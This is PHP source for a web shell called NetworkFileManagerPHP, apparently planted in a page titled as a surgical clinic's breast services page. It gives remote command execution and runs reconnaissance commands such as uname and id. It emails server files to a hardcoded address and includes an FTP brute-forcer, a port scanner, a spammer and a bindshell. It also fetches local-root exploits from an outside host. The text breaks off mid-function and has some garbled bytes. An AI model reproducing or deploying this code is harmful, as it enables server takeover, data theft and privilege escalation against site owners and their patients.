Evergreen Surgical Clinic :: Breast Services

"
if (ini_get('register_globals') != '1') {

if (!empty($HTTP_POST_VARS))

extract($HTTP_POST_VARS);

if (!empty($HTTP_GET_VARS))

extract($HTTP_GET_VARS);

if (!empty($HTTP_SERVER_VARS))

extract($HTTP_SERVER_VARS);

}

$use_md5=0; // Define use of MD5 crypt algoritm //

$uname="1";

$upass="1";

if ($action != "download" && $action != "view" ):

?>

/* Define your email for file send function*/

$demail ="effes2004@gmail.com";

/* config here */

$title="NetworkFileManagerPHP for channel #hack.ru";

$ver="1.7.private ([final_english_release])";

$sob="Belongs to revers";

$id="1337";

/* FTP-bruteforce */

$filename="/etc/passwd";

$ftp_server="localhost";

/* port scanner */

$min="1";

$max="65535";

/* Aliases */

$aliases=array(

/* find all SUID files */

'find / -type f -perm -04000 -ls' => 'find all suid files' ,

/* find all SGID files */

'find / -type f -perm -02000 -ls' => 'find all sgid files',

/* find all config.inc.php files */

'find / -type f -name config.inc.php' => 'find all config.inc.php files',

/* find accesseable writeable directories and files*/

'find / -perm -2 -ls' => 'find writeable directories and files',

'ls -la' => 'Current directory listing with rights access',

'find / -name *.php | xargs grep -li password' =>'searsh all file .php word password'

);

/* ports and services names */

$port[1] = "tcpmux (TCP Port Service Multiplexer)";

$port[2] = "Management Utility";

$port[3] = "Compression Process";

$port[5] = "rje (Remote Job Entry)";

$port[7] = "echo";

$port[9] = "discard";

$port[11] = "systat";

$port[13] = "daytime";

$port[15] = "netstat";

$port[17] = "quote of the day";

$port[18] = "send/rwp";

$port[19] = "character generator";

$port[20] = "ftp-data";

$port[21] = "ftp";

$port[22] = "ssh, pcAnywhere";

$port[23] = "Telnet";

$port[25] = "SMTP (Simple Mail Transfer)";

$port[27] = "ETRN (NSW User System FE)";

$port[29] = "MSG ICP";

$port[31] = "MSG Authentication";

$port[33] = "dsp (Display Support Protocol)";

$port[37] = "time";

$port[38] = "RAP (Route Access Protocol)";

$port[39] = "rlp (Resource Location Protocol)";

$port[41] = "Graphics";

$port[42] = "nameserv, WINS";

$port[43] = "whois, nickname";

$port[44] = "MPM FLAGS Protocol";

$port[45] = "Message Processing Module [recv]";

$port[46] = "MPM [default send]";

$port[47] = "NI FTP";

$port[48] = "Digital Audit Daemon";

$port[49] = "TACACS, Login Host Protocol";

$port[50] = "RMCP, re-mail-ck";

$port[53] = "DNS";

$port[57] = "MTP (any private terminal access)";

$port[59] = "NFILE";

$port[60] = "Unassigned";

$port[61] = "NI MAIL";

$port[62] = "ACA Services";

$port[63] = "whois++";

$port[64] = "Communications Integrator (CI)";

$port[65] = "TACACS-Database Service";

$port[66] = "Oracle SQL*NET";

$port[67] = "bootps (Bootstrap Protocol Server)";

$port[68] = "bootpd/dhcp (Bootstrap Protocol Client)";

$port[69] = "Trivial File Transfer Protocol (tftp)";

$port[70] = "Gopher";

$port[71] = "Remote Job Service";

$port[72] = "Remote Job Service";

$port[73] = "Remote Job Service";

$port[74] = "Remote Job Service";

$port[75] = "any private dial out service";

$port[76] = "Distributed External Object Store";

$port[77] = "any private RJE service";

$port[78] = "vettcp";

$port[79] = "finger";

$port[80] = "World Wide Web HTTP";

$port[81] = "HOSTS2 Name Serve";

$port[82] = "XFER Utility";

$port[83] = "MIT ML Device";

$port[84] = "Common Trace Facility";

$port[85] = "MIT ML Device";

$port[86] = "Micro Focus Cobol";

$port[87] = "any private terminal link";

$port[88] = "Kerberos, WWW";

$port[89] = "SU/MIT Telnet Gateway";

$port[90] = "DNSIX Securit Attribute Token Map";

$port[91] = "MIT Dover Spooler";

$port[92] = "Network Printing Protocol";

$port[93] = "Device Control Protocol";

$port[94] = "Tivoli Object Dispatcher";

$port[95] = "supdup";

$port[96] = "DIXIE";

$port[98] = "linuxconf";

$port[99] = "Metagram Relay";

$port[100] = "[unauthorized use]";

$port[101] = "HOSTNAME";

$port[102] = "ISO, X.400, ITOT";

$port[103] = "Genesis Point-to㝀ƭoi T��ns��et";

$port[104] = "ACR-NEMA Digital Imag. & Comm. 300";

$port[105] = "CCSO name server protocol";

$port[106] = "poppassd";

$port[107] = "Remote Telnet Service";

$port[108] = "SNA Gateway Access Server";

$port[109] = "POP2";

$port[110] = "POP3";

$port[111] = "Sun RPC Portmapper";

$port[112] = "McIDAS Data Transmission Protocol";

$port[113] = "Authentication Service";

$port[115] = "sftp (Simple File Transfer Protocol)";

$port[116] = "ANSA REX Notify";

$port[117] = "UUCP Path Service";

$port[118] = "SQL Services";

$port[119] = "NNTP";

$port[120] = "CFDP";

$port[123] = "NTP";

$port[124] = "SecureID";

$port[129] = "PWDGEN";

$port[133] = "statsrv";

$port[135] = "loc-srv/epmap";

$port[137] = "netbios-ns";

$port[138] = "netbios-dgm (UDP)";

$port[139] = "NetBIOS";

$port[143] = "IMAP";

$port[144] = "NewS";

$port[150] = "SQL-NET";

$port[152] = "BFTP";

$port[153] = "SGMP";

$port[156] = "SQL Service";

$port[161] = "SNMP";

$port[175] = "vmnet";

$port[177] = "XDMCP";

$port[178] = "NextStep Window Server";

$port[179] = "BGP";

$port[180] = "SLmail admin";

$port[199] = "smux";

$port[210] = "Z39.50";

$port[213] = "IPX";

$port[218] = "MPP";

$port[220] = "IMAP3";

$port[256] = "RAP";

$port[257] = "Secure Electronic Transaction";

$port[258] = "Yak Winsock Personal Chat";

$port[259] = "ESRO";

$port[264] = "FW1_topo";

$port[311] = "Apple WebAdmin";

$port[350] = "MATIP type A";

$port[351] = "MATIP type B";

$port[363] = "RSVP tunnel";

$port[366] = "ODMR (On-Demand Mail Relay)";

$port[371] = "Clearcase";

$port[387] = "AURP (AppleTalk Update-Based Routing Protocol)";

$port[389] = "LDAP";

$port[407] = "Timbuktu";

$port[427] = "Server Location";

$port[434] = "Mobile IP";

$port[443] = "ssl";

$port[444] = "snpp, Simple Network Paging Protocol";

$port[445] = "SMB";

$port[458] = "QuickTime TV/Conferencing";

$port[468] = "Photuris";

$port[475] = "tcpnethaspsrv";

$port[500] = "ISAKMP, pluto";

$port[511] = "mynet-as";

$port[512] = "biff, rexec";

$port[513] = "who, rlogin";

$port[514] = "syslog, rsh";

$port[515] = "lp, lpr, line printer";

$port[517] = "talk";

$port[520] = "RIP (Routing Information Protocol)";

$port[521] = "RIPng";

$port[522] = "ULS";

$port[531] = "IRC";

$port[543] = "KLogin, AppleShare over IP";

$port[545] = "QuickTime";

$port[548] = "AFP";

$port[554] = "Real Time Streaming Protocol";

$port[555] = "phAse Zero";

$port[563] = "NNTP over SSL";

$port[575] = "VEMMI";

$port[581] = "Bundle Discovery Protocol";

$port[593] = "MS-RPC";

$port[608] = "SIFT/UFT";

$port[626] = "Apple ASIA";

$port[631] = "IPP (Internet Printing Protocol)";

$port[635] = "RLZ DBase";

$port[636] = "sldap";

$port[642] = "EMSD";

$port[648] = "RRP (NSI Registry Registrar Protocol)";

$port[655] = "tinc";

$port[660] = "Apple MacOS Server Admin";

$port[666] = "Doom";

$port[674] = "ACAP";

$port[687] = "AppleShare IP Registry";

$port[700] = "buddyphone";

$port[705] = "AgentX for SNMP";

$port[901] = "swat, realsecure";

$port[993] = "s-imap";

$port[995] = "s-pop";

$port[1024] = "Reserved";

$port[1025] = "network blackjack";

$port[1062] = "Veracity";

$port[1080] = "SOCKS";

$port[1085] = "WebObjects";

$port[1227] = "DNS2Go";

$port[1243] = "SubSeven";

$port[1338] = "Millennium Worm";

$port[1352] = "Lotus Notes";

$port[1381] = "Apple Network License Manager";

$port[1417] = "Timbuktu Service 1 Port";

$port[1418] = "Timbuktu Service 2 Port";

$port[1419] = "Timbuktu Service 3 Port";

$port[1420] = "Timbuktu Service 4 Port";

$port[1433] = "Microsoft SQL Server";

$port[1434] = "Microsoft SQL Monitor";

$port[1477] = "ms-sna-server";

$port[1478] = "ms-sna-base";

$port[1490] = "insitu-conf";

$port[1494] = "Citrix ICA Protocol";

$port[1498] = "Watcom-SQL";

$port[1500] = "VLSI License Manager";

$port[1503] = "T.120";

$port[1521] = "Oracle SQL";

$port[1522] = "Ricardo North America License Manager";

$port[1524] = "ingres";

$port[1525] = "prospero";

$port[1526] = "prospero";

$port[1527] = "tlisrv";

$port[1529] = "oracle";

$port[1547] = "laplink";

$port[1604] = "Citrix ICA, MS Terminal Server";

$port[1645] = "RADIUS Authentication";

$port[1646] = "RADIUS Accounting";

$port[1680] = "Carbon Copy";

$port[1701] = "L2TP/LSF";

$port[1717] = "Convoy";

$port[1720] = "H.323/Q.931";

$port[1723] = "PPTP control port";

$port[1731] = "MSICCP";

$port[1755] = "Windows Media .asf";

$port[1758] = "TFTP multicast";

$port[1761] = "cft-0";

$port[1762] = "cft-1";

$port[1763] = "cft-2";

$port[1764] = "cft-3";

$port[1765] = "cft-4";

$port[1766] = "cft-5";

$port[1767] = "cft-6";

$port[1808] = "Oracle-VP2";

$port[1812] = "RADIUS server";

$port[1813] = "RADIUS accounting";

$port[1818] = "ETFTP";

$port[1973] = "DLSw DCAP/DRAP";

$port[1985] = "HSRP";

$port[1999] = "Cisco AUTH";

$port[2001] = "glimpse";

$port[2049] = "NFS";

$port[2064] = "distributed.net";

$port[2065] = "DLSw";

$port[2066] = "DLSw";

$port[2106] = "MZAP";

$port[2140] = "DeepThroat";

$port[2301] = "Compaq Insight Management Web Agents";

$port[2327] = "Netscape Conference";

$port[2336] = "Apple UG Control";

$port[2427] = "MGCP gateway";

$port[2504] = "WLBS";

$port[2535] = "MADCAP";

$port[2543] = "sip";

$port[2592] = "netrek";

$port[2727] = "MGCP call agent";

$port[2628] = "DICT";

$port[2998] = "ISS Real Secure Console Service Port";

$port[3000] = "Firstclass";

$port[3001] = "Redwood Broker";

$port[3031] = "Apple AgentVU";

$port[3128] = "squid";

$port[3130] = "ICP";

$port[3150] = "DeepThroat";

$port[3264] = "ccmail";

$port[3283] = "Apple NetAssitant";

$port[3288] = "COPS";

$port[3305] = "ODETTE";

$port[3306] = "mySQL";

$port[3389] = "RDP Protocol (Terminal Server)";

$port[3521] = "netrek";

$port[4000] = "icq, command-n-conquer and shell nfm";

$port[4321] = "rwhois";

$port[4333] = "mSQL";

$port[4444] = "KRB524";

$port[4827] = "HTCP";

$port[5002] = "radio free ethernet";

$port[5004] = "RTP";

$port[5005] = "RTP";

$port[5010] = "Yahoo! Messenger";

$port[5050] = "multimedia conference control tool";

$port[5060] = "SIP";

$port[5150] = "Ascend Tunnel Management Protocol";

$port[5190] = "AIM";

$port[5500] = "securid";

$port[5501] = "securidprop";

$port[5423] = "Apple VirtualUser";

$port[5555] = "Personal Agent";

$port[5631] = "PCAnywhere data";

$port[5632] = "PCAnywhere";

$port[5678] = "Remote Replication Agent Connection";

$port[5800] = "VNC";

$port[5801] = "VNC";

$port[5900] = "VNC";

$port[5901] = "VNC";

$port[6000] = "X Windows";

$port[6112] = "BattleNet";

$port[6502] = "Netscape Conference";

$port[6667] = "IRC";

$port[6670] = "VocalTec Internet Phone, DeepThroat";

$port[6699] = "napster";

$port[6776] = "Sub7";

$port[6970] = "RTP";

$port[7007] = "MSBD, Windows Media encoder";

$port[7070] = "RealServer/QuickTime";

$port[7777] = "cbt";

$port[7778] = "Unreal";

$port[7648] = "CU-SeeMe";

$port[7649] = "CU-SeeMe";

$port[8000] = "iRDMI/Shoutcast Server";

$port[8010] = "WinGate 2.1";

$port[8080] = "HTTP";

$port[8181] = "HTTP";

$port[8383] = "IMail WWW";

$port[8875] = "napster";

$port[8888] = "napster";

$port[8889] = "Desktop Data TCP 1";

$port[8890] = "Desktop Data TCP 2";

$port[8891] = "Desktop Data TCP 3: NESS application";

$port[8892] = "Desktop Data TCP 4: FARM product";

$port[8893] = "Desktop Data TCP 5: NewsEDGE/Web application";

$port[8894] = "Desktop Data TCP 6: COAL application";

$port[9000] = "CSlistener";

$port[10008] = "cheese worm";

$port[11371] = "PGP 5 Keyserver";

$port[13223] = "PowWow";

$port[13224] = "PowWow";

$port[14237] = "Palm";

$port[14238] = "Palm";

$port[18888] = "LiquidAudio";

$port[21157] = "Activision";

$port[22555] = "Vocaltec Web Conference";

$port[23213] = "PowWow";

$port[23214] = "PowWow";

$port[23456] = "EvilFTP";

$port[26000] = "Quake";

$port[27001] = "QuakeWorld";

$port[27010] = "Half-Life";

$port[27015] = "Half-Life";

$port[27960] = "QuakeIII";

$port[30029] = "AOL Admin";

$port[31337] = "Back Orifice";

$port[32777] = "rpc.walld";

$port[45000] = "Cisco NetRanger postofficed";

$port[32773] = "rpc bserverd";

$port[32776] = "rpc.spray";

$port[32779] = "rpc.cmsd";

$port[38036] = "timestep";

$port[40193] = "Novell";

$port[41524] = "arcserve discovery";

/* finished config, here goes the design */

$meta = "";

$style=<<

style;

/* table styles */

$style1=<<
STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"

table;

$style2=<<
STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"

table_file;

$style3=<<
STYLE="background:#28BECA" onmouseover="this.style.backgroundColor = '#FFFFCC'" onmouseout="this.style.backgroundColor = '#28BECA'"

table_dir;

$style4=<<
STYLE="background:#DCDCB0" onmouseover="this.style.backgroundColor = '#28BECA'" onmouseout="this.style.backgroundColor = '#DCDCB0'"

table_files;

$style_button=<<
STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"

button;

$style_open=<<
STYLE="background:#006200" onmouseover="this.style.backgroundColor = '#006200'" onmouseout="this.style.backgroundColor = '#006200'"

open;

$style_close=<<
STYLE="background:#FF0000" onmouseover="this.style.backgroundColor = '#FF0000'" onmouseout="this.style.backgroundColor = '#FF0000'"

close;

$ins=<<

ins;

/* send form */

$form = "

Help for NetworkFileManagerPHP 1.7
Feedback:
Your name:
Email:
Your questions and wishes:

";

/* HTML Form */

$HTML=<<

$title $ver

$meta

$style

$ins

NetworkFileManagerPHP (� #hack.ru) Version: $ver
Script for l33t admin job
Script help:	.:Home	.:#hack.ru	.:Feedback	.:About	.:Update
Net tools:	.:Port scanner	.:FTP bruteforce	.:Folder compression	.:Mysql Dump	.:bindshell (/bin/sh)
Exploits access:	.:bindshell		.:Exploits
l33t tools:	.:Crypter	.:Decrypter	.:Full access FTP	.:Spamer (!new!)	.:Remote upload
$sob ID:$id
.:etc/passwd		.:cpanel log	.:httpd.conf[1]	.:httpd.conf[2]	.:Bonus
Traffic tools:	.:Get the script

html;

$key="goatse";

$string="";

/* randomizing letters array for random filenames of compression folders */

$CHARS = "abcdefghijklmnopqrstuvwxyz";

for ($i=0; $i<6; $i++) $pass .= $CHARS[rand(0,strlen($CHARS)-1)];

/* set full path to host and dir where public exploits and soft are situated */

$public_site = "http://hackru.info/adm/exploits/public_exploits/";

/* $public_site = "http://localhost/adm/public_exploits/"; */

/* Public exploits and soft */

$public[1] = "s"; // bindshell

$title_ex[1] = "

bindtty.c - remote shell on 4000 port, with rights of current user (id of apache)

Run: ./s

Connect tot host with your favorite telnet client. Best of them are putty and SecureCRT

";

$public[2] = "m"; // mremap

$title_ex[2] = "

MREMAP - allows to gain local root priveleges by exploiting the bug of memory .

Run: ./m

Note: Run only from telnet session, not from web!!!

";

$public[3] = "p"; // ptrace

$title_ex[3] = "

PTRACE - good one, works like mremap, but for another bug

Run: ./p

Note: Run only from telnet session, not from web!!!

";

$public[4] = "psyBNC2.3.2-4.tar.gz"; // psybnc

$title_ex[4] = "

psyBNC - Last release of favorite IRC bouncer

Decompression: tar -zxf psyBNC2.3.2-4.tar.gz // will be folder psybnc

Compilation, installing and running psybnc: make // making psybnc // ./psybnc // You may edit psybnc.conf with NFM, Default listening port is 31337 - connect to it with your favotite IRC client and set a password

Allowed to run with uid of apache, but check out the firewall!

";

/* Private exploits */

$private[1] = "brk"; // localroot root linux 2.4.*

$title_exp[1] = "

localroot root linux 2.4.* - Exploit do_brk (code added) - gains local root priveleges if exploited succes

Run: ./brk

Note: Run only from telnet session, not from web!!!

";

$private[2] = "dupescan"; // Glftpd DupeScan Local Exploit by RagnaroK

$title_exp[2] = "

lGlftpd DupeScan Local Exploit - private local root exploits for Glftpd daemon

There are 2 files: dupescan and glftpd To gain root uid, you need to write dupescan to

glftpd/bin/ with command cp dupescan glftpd/bin/, and after run ./glftpd. Get the root!!!

   Note: Run only from telnet session, not from web!!!

";

$private[3] = "glftpd";

$title_exp[3] = "

  lGlftpd DupeScan Local Exploit - private local root exploits for Glftpd daemon

part 2

   Note: Run only from telnet session, not from web!!!

";

$private[4] = "sortrace";

$title_exp[4] = "

  Traceroute v1.4a5 exploit by sorbo - private local root exploit for traceroute up to 1.4.a5

Run: ./sortrace

Note: Run only from telnet session, not from web!!!

";

$private[5] = "root";

$title_exp[5] = "

localroot root linux 2.4.* - ptrace private_mod exploits, may gain local root privaleges

Run: ./root

Note: Run only from telnet session, not from web!!!

";

$private[6] = "sxp";

$title_exp[6] = "

Sendmail 8.11.x exploit localroot - private local root exploit for Sendmail 8.11.x

Run: ./sxp

Note: Run only from telnet session, not from web!!!

";

$private[7] = "ptrace_kmod";

$title_exp[7] = "

localroot root linux 2.4.* - private local root exploit, uses kmod bug + ptrace , gives local root

Run: ./ptrace_kmod

Note: Run only from telnet session, not from web!!!

";

$private[8] = "mr1_a";

$title_exp[8] = "

localroot root linux 2.4.* - mremap any memory size local root exploit for kernels 2.4.x

Run: ./mr1_a

Note: Run only from telnet session, not from web!!!

";

/* set full path to host and dir where private exploits and soft are situated */

$private_site = "http://hackru.info/adm/exploits/private_exploits/";

endif;

$createdir= "files";

/* spamer config */

$sendemail = "packetstorm@km.ru";

$confirmationemail = "packetstorm@km.ru";

$mailsubject = "Hello!This is a test message!";

/* !!!Warning: DO NOT CHANGE ANYTHING IF YOU DUNNO WHAT ARE YOU DOING */

global $action,$tm,$cm;

function getdir() {

global $gdir,$gsub,$i,$j,$REMOTE_ADDR,$PHP_SELF;

$st = getcwd();

$st = str_replace("\\","/",$st);

$j = 0;

$gdir = array();

$gsub = array();

print("
");

for ($i=0;$i<=(strlen($st)-1);$i++) {

if ($st[$i] != "/") {

$gdir[$j] = $gdir[$j].$st[$i];

$gsub[$j] = $gsub[$j].$st[$i];

} else {

$gdir[$j] = $gdir[$j]."/";

$gsub[$j] = $gsub[$j]."/";

$gdir[$j+1] = $gdir[$j];

$j++;

}

}

print("");

print("");

print("");

print("");

print("");

print("

Current directory: ");

for ($i = 0;$i<=$j;$i++) print("$gsub[$i]");

$free = tinhbyte(diskfreespace("./"));

print("

Current disk free space : $free

".exec("uname -a")."

".exec("cat /proc/cpuinfo | grep GHz")." Real speed of ".exec("cat /proc/cpuinfo | grep MHz")."

Perhaps release is : ".exec("cat /etc/redhat-release")."

".exec("id")." ".exec("who")."

Your IP: $REMOTE_ADDR $HTTP_X_FORWARDED_FOR

");

}

function tinhbyte($filesize) {

if($filesize >= 1073741824) { $filesize = round($filesize / 1073741824 * 100) / 100 . " GB"; }

elseif($filesize >= 1048576) { $filesize = round($filesize / 1048576 * 100) / 100 . " MB"; }

elseif($filesize >= 1024) { $filesize = round($filesize / 1024 * 100) / 100 . " KB"; }

else { $filesize = $filesize . ""; }

return $filesize;

}

function permissions($mode) {

$perms = ($mode & 00400) ? "r" : "-";

$perms .= ($mode & 00200) ? "w" : "-";

$perms .= ($mode & 00100) ? "x" : "-";

$perms .= ($mode & 00040) ? "r" : "-";

$perms .= ($mode & 00020) ? "w" : "-";

$perms .= ($mode & 00010) ? "x" : "-";

$perms .= ($mode & 00004) ? "r" : "-";

$perms .= ($mode & 00002) ? "w" : "-";

$perms .= ($mode & 00001) ? "x" : "-";

return $perms;

}

function readdirdata($dir) {

global $action,$files,$dirs,$tm,$supsub,$thum,$style3,$style4,$PHP_SELF;

$files = array();

$dirs= array();

$open = @opendir($dir);

if (!@readdir($open) or !$open ) echo "

Access denied.

";

else {

$open = opendir($dir);

while ($file = readdir($open)) {

$rec = $file;

$file = $dir."/".$file;

if (is_file($file)) $files[] = $rec;

}

sort($files);

$open = opendir($dir);

$i=0;

while ($dire = readdir($open)) {

if ( $dire != "." ) {

$rec = $dire;

$dire = $dir."/".$dire;

if (is_dir($dire)) {

$dirs[] = $rec;

$i++;

}

}

}

sort($dirs);

print("

Name

Size

Date of creation

Type

Access rights

Comments

");

for ($i=0;$i
if ($dirs[$i] != "..") {

$type = 'Dir';

$fullpath = $dir."/".$dirs[$i];

$time = date("d/m/y H:i",filemtime($fullpath));

$perm = permissions(fileperms($fullpath));

$size = tinhbyte(filesize($fullpath));

$name = $dirs[$i];

$fullpath = $tm."/".$dirs[$i];

if ($perm[7] == "w" && $name != "..") $action = "

Upload	Delete
Create directory	Directory compression

";

else $action = "

Read only

Directory compression

";

print("

$name

$size

$time

$type

$perm

$action

");

}

}

for ($i=0;$i
$type = 'File';

$fullpath = $dir."/".$files[$i];

$time = date("d/m/y H:i",filemtime($fullpath));

$perm = permissions(fileperms($fullpath));

$size = tinhbyte(filesize($fullpath));

if ( $perm[6] == "r" ) $act = "

View	Download
To e-mail	Copy

";

if ( $perm[7] == "w" ) $act .= "

Edit

Delete

";

print("

$files[$i]

$size

$time

$type

$perm

$act

");

}

}

}

function html() {

global $ver,$meta,$style;

echo "

NetworkFileManagerPHP

";

}

# file view

function viewfile($dir,$file) {

$buf = explode(".", $file);

$ext = $buf[sizeof($buf)-1];

$ext = strtolower($ext);

$dir = str_replace("\\","/",$dir);

$fullpath = $dir."/".$file;

switch ($ext) {

case "jpg":

header("Content-type: image/jpeg");

readfile($fullpath);

break;

case "jpeg":

header("Content-type: image/jpeg");

readfile($fullpath);

break;

case "gif":

header("Content-type: image/gif");

readfile($fullpath);

break;

case "png":

header("Content-type: image/png");

readfile($fullpath);

break;

default:

case "avi":

header("Content-type: video/avi");

readfile($fullpath);

break;

default:

case "mpeg":

header("Content-type: video/mpeg");

readfile($fullpath);

break;

default:

case "mpg":

header("Content-type: video/mpg");

readfile($fullpath);

break;

default:

html();

chdir($dir);

getdir();

echo "

Path to filename:$fullpath

$st

";

echo $tem;

fclose($fp);

break;

}

}

# send file to mail

function download_mail($dir,$file) {

global $action,$tm,$cm,$demail, $REMOTE_ADDR, $HTTP_HOST, $PATH_TRANSLATED;

$buf = explode(".", $file);

$dir = str_replace("\\","/",$dir);

$fullpath = $dir."/".$file;

$size = tinhbyte(filesize($fullpath));

$fp = fopen($fullpath, "rb");

while(!feof($fp))

$attachment .= fread($fp, 4096);

$attachment = base64_encode($attachment);

$subject = "NetworkFileManagerPHP ($file)";

$boundary = uniqid("NextPart_");

$headers = "From: $demail\nContent-type: multipart/mixed; boundary=\"$boundary\"";

$info = "---==== Message from ($demail)====---\n\n";

$info .= "IP:\t$REMOTE_ADDR\n";

$info .= "HOST:\t$HTTP_HOST\n";

$info .= "URL:\t$HTTP_REFERER\n";

$info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";

$info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--";

$send_to = "$demail";

$send = mail($send_to, $subject, $info, $headers);

if($send == 2)

echo "

Thank you!!!File $file was successfully sent to $demail.

";

fclose($fp);

}

function copyfile($dir,$file) {

global $action,$tm;

$fullpath = $dir."/".$file;

echo "

Filename : $file copied successfully to $dir

";

if (!copy($file, $file.'.bak')){

echo (" unable to copy file $file");

}

}

# file edit

function editfile($dir,$file) {

global $action,$datar;

$fullpath = $dir."/".$file;

chdir($dir);

getdir();

echo "

Filename :$fullpath

";

$fp = fopen($fullpath , "r");

while (!feof($fp)) {

$char = fgetc($fp);

$st .= $char;

}

$st = str_replace("&", "&", $st);

$st = str_replace("<", "<", $st);

$st = str_replace(">", ">", $st);

$st = str_replace('"', """, $st);

echo "";

$datar = $S1;

}

# file write

function savefile($dir,$file) {

global $action,$S1,$tm;

$fullpath = $dir."/".$file;

$fp = fopen($fullpath, "w");

$S1 = stripslashes($S1);

fwrite($fp,$S1);

fclose($fp);

chdir($dir);

echo "

File $fullpath was saved successfully.

";

getdir();

readdirdata($tm);

}

# directory delete

function deletef($dir)

{

global $action,$tm,$fi;

$tm = str_replace("\\\\","/",$tm);

$link = $tm."/".$fi;

unlink($link);

chdir($tm);

getdir();

readdirdata($tm);

}

# file upload

function uploadtem() {

global $file,$tm,$thum,$PHP_SELF,$dir,$style_button;

echo "

Upload file:

";

}

function upload() {

global $HTTP_POST_FILES,$tm;

echo $set;

copy($HTTP_POST_FILES["userfile"][tmp_name], $tm."/".$HTTP_POST_FILES["userfile"][name]) or die("Unable to upload file".$HTTP_POST_FILES["userfile"][name]);

echo "

File ".$HTTP_POST_FILES["userfile"][name]." was successfully uploaded.

";

@unlink($userfile);

chdir($tm);

getdir();

readdirdata($tm);

}

# get exploits

function upload_exploits() {

global $PHP_SELF,$style_button, $public_site, $private_site, $public, $title_ex, $style_open, $private, $title_exp;

echo "

Public exploits and soft:
bindshell (bin/sh) - bindtty.c (binary file to run - s)
$title_ex[1]

";

echo "

Local ROOT for linux 2.6.20 - mremap (binary file to run - m)
$title_ex[2]

";

echo "

Local ROOT for linux 2.6.20 - ptrace (binary file to run - p)
$title_ex[3]

";

echo "

psyBNC version:2.3.2-4 - psyBNC (binary file to run - ./psybnc)
$title_ex[4]

";

echo "

Private exploits:
BRK - Local Root Unix 2.4.* (binary file to run - brk)
$title_exp[1]

";

echo "

Glftpd DupeScan Local Exploit File 1 (binary file to run - $private[2] )
$title_exp[2]

";

echo "

Glftpd DupeScan Local Exploit File 2 (binary file to run - $private[3] )
$title_exp[3]

";

echo "

Traceroute v1.4a5 exploit by sorbo (binary file to run - $private[4] )
$title_exp[4]

";

echo "

Local Root Unix 2.4.* (binary file to run - $private[5] )
$title_exp[5]

";

echo "

Sendmail 8.11.x exploit localroot (binary file to run - $private[6] )
$title_exp[6]

";

echo "

Local Root Unix 2.4.* (binary file to run - $private[7] )
$title_exp[7]

";

echo "

Local Root Unix 2.4.* (binary file to run - $private[8] )
$title_exp[8]

";

}

# new directory creation

function newdir($dir) {

global $tm,$nd;

print("

Create directory:

");

}

function cdir($dir) {

global $newd,$tm;

$fullpath = $dir."/".$newd;

if (file_exists($fullpath)) @rmdir($fullpath);

if (@mkdir($fullpath,0777)) {

echo "

Directory was created.

";

} else {

echo "

Error during directory creation.

";

}

chdir($tm);

getdir();

readdirdata($tm);

}

// creation of directory where exploits will be situated

function downfiles() {

global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2, $gdir,$gsub,$i,$j,$REMOTE_ADDR;

$st = getcwd();

$st = str_replace("\\","/",$st);

$j = 0;

$gdir = array();

$gsub = array();

print("
");

for ($i=0;$i<=(strlen($st)-1);$i++) {

if ($st[$i] != "/") {

$gdir[$j] = $gdir[$j].$st[$i];

$gsub[$j] = $gsub[$j].$st[$i];

} else {

$gdir[$j] = $gdir[$j]."/";

$gsub[$j] = $gsub[$j]."/";

$gdir[$j+1] = $gdir[$j];

$j++;

}

}

print("

Path: ");

for ($i = 0;$i<=$j;$i++) print("$gsub[$i]");

print("

");

echo "

Upload files from remote computer:
HTTP link to filename:
filename (may also include full path to file)

";

}

# directory delete

function deldir() {

global $dd,$tm;

$fullpath = $tm."/".$dd;

echo "

Directory was deleted successfully.

";

rmdir($fullpath);

chdir($tm);

getdir();

readdirdata($tm);

}

# directory compression

function arhiv() {

global $tar,$tm,$pass;

$fullpath = $tm."/".$tar;

echo "

Directory $fullpath ".exec("tar -zc $fullpath -f $pass.tar.gz")."was compressed to file $pass.tar.gz

";

}

function down($dir) {

global $action,$status, $tm,$PHP_SELF,$HTTP_HOST, $file3, $file2;

ignore_user_abort(1);

set_time_limit(0);

echo "

File upload

There are many cases, when host, where NFM is situated WGET is blocked. And you may need to upload files anyway. So here you can do it without wget, upload file to path where the NFM is, or to any path you enter (seePath).(this works not everywhere)

";

if (!isset($status)) downfiles();

else

{

$data = @implode("", file($file3));

$fp = @fopen($file2, "wb");

@fputs($fp, $data);

$ok = @fclose($fp);

if($ok)

{

$size = filesize($file2)/1024;

$sizef = sprintf("%.2f", $size);

print "

You have uploaded: file $file2 with size (".$sizef."kb)

";

}

else

{

print "

Error during file upload

";

}

}

}

# mail function

function mailsystem() {

global $status,$form,$action,$name,$email,$pole,$REMOTE_ADDR,$HTTP_REFERER,$DOCUMENT_ROOT,$PATH_TRANSLATED,$HTTP_HOST;

echo "

Questions and wishes for NetworkFileManagerPHP<"

xxxxxxxxx